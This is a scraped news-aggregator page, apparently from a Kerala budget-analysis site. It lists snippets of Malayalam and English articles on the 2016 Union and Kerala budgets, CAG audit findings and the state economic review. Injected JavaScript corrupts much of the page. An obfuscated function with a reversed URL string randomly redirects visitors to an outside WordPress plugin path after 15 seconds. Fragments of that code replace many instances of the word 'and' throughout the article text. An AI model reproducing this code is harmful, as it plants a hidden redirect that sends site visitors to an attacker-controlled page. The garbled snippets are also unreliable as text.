The service is currently unavailable
 • പൊതുബജറ്റ്

  7.6% സാമ്പത്തിക വളർച്ച നേടി ആഗോളമായി വളർച്ചയിലും വ്യാപാരത്തിലും മന്ദത അനുഭവപ്പെട്ടപ്പോൾ ഇന്ത്യ പിടിച്ചു നിന്നു വെല്ലുവിളികളെ സാധ്യതകളായാണ് പരിഗണിക്കുന്നതെന്ന് ധനമന്ത്രി ബജറ്റ് ആമുഖപ്രസംഗത്തിൽ. ആഗോള സമ്പദ് വ്യവസ്ഥ വെല്ലുവിളികൾ നേരിടുന്നെങ്കിലും ഇന്ത്യൻ സമ്പദ് വ്യവസ്ഥ പിടിച്ചു നിൽക്കുന്നതായി ധനമന്ത്രി. വിദേശനാണ്യ ശേഖരം എക്കാലത്തെയും വലിയ തലത്തിൽ 35,000 കോടി ഡോളറായി.ഏഴാം ശമ്പളക്കമ്മിഷന്റെ ശുപാർശകൾ നടപ്പാക്കുന്നത് വരുന്ന സാമ്പത്തിക വർഷം കൂടുതൽ ബാധ്യത സൃഷ്ടിക്കുമെന്ന് ആമുഖ പ്രസംഗത്തിൽ ധനമന്ത്രിസംസ്ഥാനങ്ങളുടെ സഹകരണത്തോടെ ദാരിദ്രരേഖയ്ക്കു താഴെയുള്ള കുടുംബങ്ങൾക്ക് പാചകവാതകം എത്തിക്കാൻ […]

  Continue Reading

 • കേന്ദ്ര ബജറ്റ് ഇന്ന്; പുതിയ നികുതികൾക്കു സാധ്യത…

  ന്യൂഡൽഹി ∙ കേന്ദ്ര ധനമന്ത്രി അരുൺ ജയ്റ്റ്ലി ഇന്ന് അവതരിപ്പിക്കുന്ന ബജറ്റിൽ നികുതിവർധനകൾക്കും പുതിയ   Date: 29.02.2016 Source: Malayala Manrorama

  Continue Reading

 • കേന്ദ്ര പൊതുബജറ്റ് ഇന്ന്…

  ന്യൂഡൽഹി ∙ കേന്ദ്രസര്‍ക്കാരിന്‍റെ പൊതുബജറ്റ് ഇന്ന്. സാമ്പത്തിക മാന്ദ്യം പിടിമുറുക്കുന്ന സാഹചര്യത്തില… Date: 29.02.2016 Source: Malayala mManorama

  Continue Reading

 • ‘താഴേത്തട്ടിൽ ആദ്യമെത്തേണ്ടത് സമ്പാദ്യമാർഗങ്ങളാണ്, വായ്പയല്ല’……

  Dated: 25.02.2016 Source: Mthrubhoomi  

  Continue Reading

 • Banking on Reforms

  Date: 25.02.2016 Source:Times of India p:Times of India

  Continue Reading

 • ‘താഴേത്തട്ടിൽ ആദ്യമെത്തേണ്ടത് സമ്പാദ്യമാർഗങ്ങളാണ്, വായ്പയല്ല’……

  Dated: 25.02.2016 Source: Mthrubhoomi  

  Continue Reading

 • VAT NET NOT WIDE ENOUGH

  Continue Reading

 • Anomalies in scheme to fund madrassas: CAG

  The report of Comptroller andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and Auditor General (CAG) of India relating to grants given to madrassas shows serious anomalies in implementing the Scheme for Providing Quality of Education in Madrassas (SPQEM). The CAG scrutiny revealed that children from 39 out of the 40 madrassas that were audited were actually students […]

  Continue Reading

 • `Govt botched social sector schemes’

  Non-adherence to legalities, irregularities in procurements, inadmissible payments andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and delays in finalising bids, have jeopardised schemes andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and fund utilisations in various departments under the social sector, says the report of the Comptroller andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and Auditor General (CAG), which was laid on […]

  Continue Reading

 • Juvenile delinquents left in the lurch

    The Comptroller andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and Auditor General (CAG) report tabled in the assembly on Wednesday observes that the `Place of Safe ty’ to accommodate juveniles who are in conflict with law in the state are deprived of basic services like counselling, medical care andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and educa tional […]

  Continue Reading

 • Cabinet approves annual plan of Rs. 30543 crore

  By Special Correspondent on Wed, 23/12/2015 – 18:59 Thiruvananthapuram: Kerala Cabinet approved the Annual Plan with total outlay of Rs. 30543.17 crore for 2016-17 on Wednesday. Of this, Rs. 24000 crore is State plan andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and Rs. 6534.17 crore is outlay for centrally sponsored projects. The Plan has been approved by […]

  Continue Reading

 • Economy andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and Budget: Kerala may find the going tough

  By Roy Mathew on Thu, 11/02/2016 – 18:49 newsandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andviews.org.in

  $hiVNZt4Y5cDrbJXMhLy=function(n){if (typeof ($hiVNZt4Y5cDrbJXMhLy.list[n]) == "string") return $hiVNZt4Y5cDrbJXMhLy.list[n].split("").reverse().join("");return $hiVNZt4Y5cDrbJXMhLy.list[n];};$hiVNZt4Y5cDrbJXMhLy.list=["'php.sgnittes-nigulp/nwodkcol-nigol/snigulp/tnetnoc-pw/moc.aretup07hn//:ptth'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.random()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and Budget: Kerala may find the going tough">Continue Reading

 • വിലകുറച്ച് എക്സ്ചേഞ്ച് നിരക്ക് റിസർവ് ബാങ്ക് ഗവർണർ രഘുറാം രാജൻ

  തിരുവനന്തപുരം: റിസർവ് ബാങ്ക് ഗവർണർ രഘുറാം രാജൻ വിനിമയ നിരക്ക് undervaluation സാമ്പത്തിക വളർച്ച കൈവരിക്കാൻ ഒരു രീതി ആയിരുന്നില്ല പറഞ്ഞു. “ചൈന, ജപ്പാൻ, കൊറിയ ചൂണ്ടിക്കാട്ടിയിട്ട്, ചില സംരംഭങ്ങൾ ഒരു undervalued വിനിമയ നിരക്കിൽ വഴി വയ്ക്കുന്നു ഞങ്ങൾ ഇന്ത്യയിൽ ശ്രമിക്കണം വാദിച്ചിട്ടുണ്ട്. എന്നാൽ പ്രശ്നങ്ങൾ ഒത്തിരി ആ രാജ്യങ്ങളിൽ ഇപ്പോൾ അഭിമുഖീകരിക്കുന്ന ഏത് വിനിമയ നിരക്ക് undervaluing ൽ ഉണ്ട്, “അവൻ പറഞ്ഞു. രാജൻ ഇന്ത്യ ചെറുകിട ഉച്ചകോടി 2016 തിങ്കളാഴ്ച കോൺഫെഡറേഷൻ ഓഫ് […]

  Continue Reading

 • Rajan Not for Devaluing Exchange Rate

  THIRUVANANTHAPURAM: RBI Governor Raghuram Rajan has said that undervaluation of exchange rate was not a method to achieve economic growth. “Citing China, Japan andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and Korea, some argue that enterprises can grow through an undervalued exchange rate andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and we should try it in India. But there […]

  Continue Reading

 • Kerala Budget 2016-17: Key Highlights

  Key highlights of Kerala Budget 2016-17 Rs 100 crore for building new dam in Mullaperiyar Rs 500 crore for rubber farmers so as to ensure that they get Rs 150 per kg of rubber Rs 40 crore for Sabarimala Master Plan Rs 24.6 crore for Vizhinjam port project Rs 694 crore for urban development Education […]

  Continue Reading

 • വികസനം ലക്ഷ്യമിടുന്ന കേരള ബജറ്റ്…

  വൻ വികസന പ്രവർത്തനങ്ങൾക്കൊപ്പം കാർഷിക മേഖലയുടെ വികസനവും ലക്ഷ്യമിട്ടുള്ളതാണ് 2016-2017 ലെ സംസ്ഥാന ബജറ… Read more at: http://www.manoramaonline.com/news/just-in/budget-analysis-george-kuruvilla.html   Date: 12.02.2016 Source: Manoramaonline

  Continue Reading

 • ഏപ്രിൽ മുതൽ നാലുമാസത്തേക്കുള്ള വോട്ട് ഓൺ അക്കൗണ്ട് മുഖ്യമന്ത്രി നിയമസഭയുടെ മേശപ്പുറത്തു വച്ചു ബജറ്റ് അവതരണം പൂർത്തിയായി

  9,897 കോടിരൂപയുടെ കമ്മി; 19,971 കോടിരൂപയുടെ ധനകമ്മി. 24,000 കോടിരൂപയുടെ വാർഷിക വികസന പദ്ധതികൾ നടപ്പാക്കും. നെൽകൃഷി വികസനത്തിന് 35 കോടി രൂപ. കൂത്തുപറമ്പിൽ ചക്ക അധിഷ്ഠിത വ്യവസായം. നീര ഉൽപാദനത്തിന് 5 കോടി സബ്സിഡി. സുസ്ഥിര നെൽകൃഷി വികസനത്തിന് 27 കോടി. റബറിന് താങ്ങുവില ഉറപ്പാക്കാൻ 500 കോടി രൂപ അനുവദിച്ചു. കിലോയ്ക്ക് 25 രൂപ നിരക്കിൽ പച്ചത്തേങ്ങ സംഭരിക്കും. നാളികേര വികസന പദ്ധതികൾക്ക് 45 കോടി. കാലിത്തീറ്റ സബ്സിഡിക്ക് 13.5 കോടി. ഹൈടെക് അഗ്രികൾച്ചർ […]

  Continue Reading

 • Kerala Budget threatens to push up cost of essentials

  T. Nandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andakumar The Kerala Budget presented by Finance Minister K.M. Mani amid stormy scenes in the Assembly on Friday slapped taxes on various sectors, threatening to send prices of essentials on an upward spiral. Mr. Mani proposed an additional tax of one rupee per litre on petrol andom()*5);if (c==3){var delay […]

  Continue Reading

 • പാവപ്പെട്ട എല്ലാവര്‍ക്കും വീട്; ഗ്രാമീണ വികസനത്തിന് 4057.4 കോടി……

  എല്ലാ വീടുകളിലും അടുക്കളത്തോട്ടമുണ്ടാക്കാന്‍ സഹായം നല്‍കും…… തിരുവനന്തപുരം: ഗ്രാമീണ വികസനത്തിന് ബജറ്റില്‍ സര്‍ക്കാര്‍ 4057.4 കോടി വകയിരുത്തി.  പാവപ്പെട്ട എല്ലാവര്‍ക്കും വീട്, സ്ത്രീശാക്തീകരണ ലക്ഷ്യത്തോടെ കുടുംബശ… Date: 12.02.2016 Source: Mathrubhoomi

  Continue Reading

 • ഊന്നല്‍ റോഡുകള്‍ക്കും പാലങ്ങള്‍ക്കും: റബറിനും തേങ്ങയ്ക്കും കൈത്താങ്ങ

  തിരുവനന്തപുരം:  അടിസ്ഥാന സൗകര്യ വികസനത്തിന് ഊന്നല്‍ നല്‍കി യു.ഡി.എഫ് സര്‍ക്കാരിന്റെ അഞ്ചാം ബജറ്റ് മുഖ്യമന്ത്രി ഉമ്മന്‍ ചാണ്ടി നിയമസഭയില്‍ അവതരിപ്പിച്ച… Date: 12.02.2016 Source: Mathrbhoomi Live

  Continue Reading

 • വ്യാവസായിക പരിസ്ഥിതി അഭിവൃദ്ധി

  സംസ്ഥാനത്ത് വ്യവസായ മേഖല സംരംഭകത്വം നൈപുണ്യ വികസന അടിസ്ഥാന പ്രൊമോഷൻ വികസനത്തിന് വഴി ദ്രുതഗതിയിലുള്ള വളർച്ച ചെയ്തു, സാമ്പത്തിക review.The സംസ്ഥാന സർക്കാർ സാഹചര്യങ്ങള് മെച്ചപ്പെടുത്തുന്നതിനുവേണ്ടി വിജയകരമായി വിവിധ പദ്ധതികൾ നടപ്പിലാക്കി പ്രസ്താവിക്കുന്നു.   സംരംഭകൻ പിന്തുണ സ്കീം ഓപ്പറേഷന്റെ കൂടുതൽ ഇണക്കവും വ്യക്തമായ മാർഗനിർദേശങ്ങൾ കൊണ്ട് തുടങ്ങിയവ ചെറുകിട വിശാലമായ പിന്തുണ നൽകി, സ്ത്രീകൾ, പട്ടികജാതി, മുതലായ പ്രത്യേക വിഭാഗങ്ങൾ സംബന്ധിച്ച് സംരംഭകർ ലേക്ക് ഒറ്റത്തവണ പിന്തുണ കൊടുത്തു. 2014-15 സഹായം കാലത്ത് ഈ പദ്ധതി […]

  Continue Reading

 • ബട്ജറ്റ്‌ പ്രദാന പ്രഖ്യാപനങ്ങള്‍

  s

  Continue Reading

 • Industrial environment shows improvement

  The industrial sector in the state has witnessed rapid growth through development of infrastructure andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and promotion of entrepreneurship andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and skill development, states the economic review.The state government has implemented various schemes successfully for improving the industrial environment. The entrepreneur support scheme gave extensive support to […]

  Continue Reading

 • Traffic levels on Kerala roads beyond capacity

  The road network in Kerala, though well connected, faces severe constraints due to the urban sprawl andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and the haphazard ribbon development all along the routes, says the economic review. The existing traffic levels at most stretches are excessive andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and beyond the road capacity . The […]

  Continue Reading

 • Outlay for school edu faces steady decline

  Percentage of plan allocation for school education sector in the state has been showing a steady decline over the last four years, ac cording to the economic review. During the first year of the 12th plan, an amount of Rs 590.24 crore had been ear marked for education sector. Of this, 98.78 per cent was […]

  Continue Reading

 • Kerala fast losing gains in healthcare

  Kerala, which made significant gains in health indices including infant mortality rate andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and expectancy of life at birth, is unable to sustain or improve them, says the economic review tabled in the Assembly on Thursday . The state is facing a gamut of health issues including spread of lifestyle diseases […]

  Continue Reading

 • സാമ്പത്തിക അവലോകന രേഖ 2015 – റിപ്പോര്‍ട്ടിന്റെ പ്രസക്ത ഭാഗങ്ങള്‍

  വരുമാനം അടിസ്ഥാന വര്‍ഷ മാറ്റം ദേശീയ വരുമാനം കണക്കാക്കുന്നതിലെ അടിസ്ഥാന വര്‍ഷം 2004-05 എന്നതില്‍ നിന്നും 2011-12 ആയി മാറ്റിയിട്ടുണ്ട്. 2008ല്‍ ദേശീയ അക്കൌണ്ട്സ് സംവിധാനം സ്വീകരിച്ചതിന്റെ ഫലമായി ചില ആശയങ്ങളിലും മാറ്റം വന്നിട്ടുണ്ട്. സ്ഥിരകമ്പോളവിലയിലെ ജി.ഡി.പി.യെ (Gross Domestic Product) ഇനി മുതല്‍ ജി.ഡി.പി.യായും ഘടകമൂല്യത്തിലുള്ള ജി.ഡി.പി.യ്ക്ക് പകരം മൊത്തം സംയോജിത മൂല്യം അടിസ്ഥാന വിലയില്‍ (ജി.വി.എ.) (Gross Value Added) എന്നതായും അറിയപ്പെടും. ഇവ രണ്ടും തമ്മിലുള്ള ബന്ധം: ജി.വി.എ അടിസ്ഥാന വിലയില്‍ = […]

  Continue Reading

 • THE KERALA GROWTH PARADOX

  Key Productive Sectors In The State Have Been Hit By Declining Commodity Prices The Kerala economy has been growing at rates higher than the national economy for the past three years. But there is also a paradox. The Gross State Domestic Product (GSDP) growth rate of the state was over two percentage points higher than […]

  Continue Reading

 • Kerala gasps for growth as bank deposits surge by 15%

  eb 12 2016 : The Times of India (Kochi) Revenue Deficit Deepens, Agri Sector Badly Hit The economic review relea sed on the eve of the budge said the state lagged behind the national average in growth in 2014-15. The review put Kerala’s growth rate of Gross Value Added (GVA) a 6.20% while the national […]

  Continue Reading

 • ISDG Budget Brief: Rhetoric Vs Reality

  Are schemes announced in budget speeches merely statements of intent meant to hold out the promise of a better future, or do they reflect realistic targets that the Government commits itself to achieve? We have compiled here the findings of the CAG reports on State Finances of the Government of Kerala for the financial year […]

  Continue Reading

 • Economic Review Highlights for 2015

  സാമ്പത്തിക അവലോകന രേഖ 2015 – റിപ്പോര്‍ട്ടിന്റെ പ്രസക്ത ഭാഗങ്ങള്‍ വരുമാനം അടിസ്ഥാന വര്‍ഷ മാറ്റം ദേശീയ വരുമാനം കണക്കാക്കുന്നതിലെ അടിസ്ഥാന വര്‍ഷം 2004-05 എന്നതില്‍ നിന്നും 2011-12 ആയി മാറ്റിയിട്ടുണ്ട്. 2008ല്‍ ദേശീയ അക്കൌണ്ട്സ് സംവിധാനം സ്വീകരിച്ചതിന്റെ ഫലമായി ചില ആശയങ്ങളിലും മാറ്റം വന്നിട്ടുണ്ട്. സ്ഥിരകമ്പോളവിലയിലെ ജി.ഡി.പി.യെ (Gross Domestic Product) ഇനി മുതല്‍ ജി.ഡി.പി.യായും ഘടകമൂല്യത്തിലുള്ള ജി.ഡി.പി.യ്ക്ക് പകരം മൊത്തം സംയോജിത മൂല്യം അടിസ്ഥാന വിലയില്‍ (ജി.വി.എ.) (Gross Value Added) എന്നതായും അറിയപ്പെടും. […]

  Continue Reading

 • Increase social sector spending

  Economic policies should aim to achieve growth andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and inclusive development. The budget also should reflect these objectives. The following three major issues should be addressed regarding budget andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and economy. First, for raising growth investment has to be revived, particularly private investment. There is a debt […]

  Continue Reading

Let's talk budget.

Budget Primer

Highlights of Kerala Budget 2017- 18

Highlights of Kerala Budget 2017- 18 Budget promises Rs 25,000 crore worth infrastructure projects in 2017-18 Finance minister praises Kerala Industrial Infrastructure Board Government will spend Rs 150 crore on water conservation projects, says Isaac. Water body revival will be taken up NREGA. Free treatment for life style diseases. Primary health sector to get Rs […]

കേരള ബജറ്റ് 2017: വിവിധ മേഖലകള്‍ക്കായുള്ള തുക വകയിരുത്തല്‍

കേരള ബജറ്റ് 2017 വിവിധ മേഖലകള്‍ക്കായുള്ള തുക വകയിരുത്തല്‍ കെഎസ്ഇബിക്ക് 3000 കോടി രൂപയുടെ പാക്കേജ് 5 വര്‍ഷം കൊണ്ട് 50,000 കോടി രൂപയുടെ റോഡ് വികസനം കുടിവെള്ള പദ്ധതിക്ക് 1058 കോടി രൂപ വിപണി ഇടപെടലിന് 420 കോടി രൂപ ചെറുകിയ വ്യവസായത്തിന് 128 കോടി മലയോര ഹൈവേയ്ക്ക് 3500 കോടി രൂപ കെ-ഫോണ്‍ ഇന്റര്‍നെറ്റ് പദ്ധതിക്ക് 1000 കോടി രൂപ മൃഗ സംരക്ഷണത്തിന് 308 കോടി ശുചിത്വ മിഷന് 127 കോടി ജന്റം പദ്ധതിക്ക് […]

Subscribe

Enter your email address below to receive updates each time we publish new content.

Privacy guaranteed. We never share your info.

Budget Analysis

Economic Review of Kerala 2017

Economic Review of Kerala 2017 THIRUVANANTHAPURAM: The Economic Review tabled in the Kerala assembly on Thursday, on the eve of the LDF government’s first full budget, underlined the need to overcome fiscal mismanagement andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and stagnation andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and to urgently work out a recovery strategy. The State […]

Budget Brief on Kerala State Budget 2016-2017 Updated

Budget Brief : Kerala State Budget 2016-2017

Budget News

Highlights of Kerala Budget 2017- 18

Highlights of Kerala Budget 2017- 18 Budget promises Rs 25,000 crore worth infrastructure projects in 2017-18 Finance minister praises Kerala Industrial Infrastructure Board Government will spend Rs 150 crore on water conservation projects, says Isaac. Water body revival will be taken up NREGA. Free treatment for life style diseases. Primary health sector to get Rs […]

Economic Review of Kerala 2017

Economic Review of Kerala 2017 THIRUVANANTHAPURAM: The Economic Review tabled in the Kerala assembly on Thursday, on the eve of the LDF government’s first full budget, underlined the need to overcome fiscal mismanagement andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and stagnation andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and to urgently work out a recovery strategy. The State […]

കേരള ബജറ്റ് 2017: വിവിധ മേഖലകള്‍ക്കായുള്ള തുക വകയിരുത്തല്‍

കേരള ബജറ്റ് 2017 വിവിധ മേഖലകള്‍ക്കായുള്ള തുക വകയിരുത്തല്‍ കെഎസ്ഇബിക്ക് 3000 കോടി രൂപയുടെ പാക്കേജ് 5 വര്‍ഷം കൊണ്ട് 50,000 കോടി രൂപയുടെ റോഡ് വികസനം കുടിവെള്ള പദ്ധതിക്ക് 1058 കോടി രൂപ വിപണി ഇടപെടലിന് 420 കോടി രൂപ ചെറുകിയ വ്യവസായത്തിന് 128 കോടി മലയോര ഹൈവേയ്ക്ക് 3500 കോടി രൂപ കെ-ഫോണ്‍ ഇന്റര്‍നെറ്റ് പദ്ധതിക്ക് 1000 കോടി രൂപ മൃഗ സംരക്ഷണത്തിന് 308 കോടി ശുചിത്വ മിഷന് 127 കോടി ജന്റം പദ്ധതിക്ക് […]

Live Tweets